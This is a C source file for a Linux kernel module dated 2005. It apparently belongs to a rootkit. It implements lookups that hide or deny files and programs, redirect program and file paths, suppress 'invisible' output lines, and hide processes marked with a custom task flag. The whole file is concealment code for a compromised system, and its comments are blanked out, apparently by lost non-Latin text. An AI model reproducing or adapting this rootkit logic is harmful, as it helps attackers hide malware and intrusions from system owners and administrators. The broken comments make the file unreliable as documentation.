/****************************************
 *                                      *
 *     /  *
 *   //.         *
 *  Written by _4epen, 2005             *
 *                                      *
 ****************************************/
 
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>

#include "checkin.h"
#include "defines.h"

/*       */
char *hidden_lines[MAX_INDEX];
int hl_count;

int check(char*,int,int);
int find(char*,int,int);

#define for_each_task(p) for (p = init_hook; (p = p->next_task) != init_hook;)

/*     /  */
int f_hidden(const char* filename) { return check((char*)filename, DELETE, FILE); }
int f_lhidden(const char* filename) { return check((char*)filename, HIDE, FILE); }
int f_forbidden(const char* filename) { return check((char*)filename, DENY, FILE); }
int forbidden(const char* filename) { return check((char*)filename, DENY, PROG); }

/*          */
int is_invisible_line(char* line)
{
	int i;
	/*       */
	for(i=0;i<hl_count;i++) if(strstr(line, hidden_lines[i])!=NULL) return 1;
	/*        */
	return 0;
}

/*      /  */
int check(char* filename, int mode, int type)
{  
	if(find(filename, mode, type)!=-1) return 1;
	else return 0;
}

/*        */
char* r_check(char* filename, int type)
{
	int i;
	if((i=find(filename, REDIRECT, type))!=-1) return options[i].i_redr;
	else return NULL;
}

/*     /  */
int find(char* filename, int mode, int type)
{
	int i;
	/*    /  */
	for(i=0;i<n_options;i++) if(!strcmp(options[i].i_name, filename) && (options[i].mode==mode) && (options[i].type==type)) return i;
	/*       */
	return -1;
}

/*       */
char* redirected(const char* filename) { return r_check((char*)filename, PROG); }
char* f_redirected(const char* filename) { return r_check((char*)filename, FILE); }

/*  ,      */
int hidden(pid_t pid)
{
	struct task_struct *tsk;
	/*     pid  */
	if(pid<0) return 0;
	/*      */
	for(tsk=current;(tsk=next_task(tsk))!=current;) {
		/*     pid  */
		if(tsk->pid==pid) {
			/*  ,     */
			if((tsk->flags & 0x10000000) == 0x10000000) return 1;
			return 0;
		}
	}
	/*       */
	return 0;
}

/*      */
struct task_struct* get_process(pid_t pid)
{
	struct task_struct* tsk;
	/*     pid  */
	if(pid<0) return NULL;
	/*      */
	for(tsk=current;(tsk=next_task(tsk))!=current;) if(tsk->pid==pid) return tsk;
	/*       */
	return NULL;
}
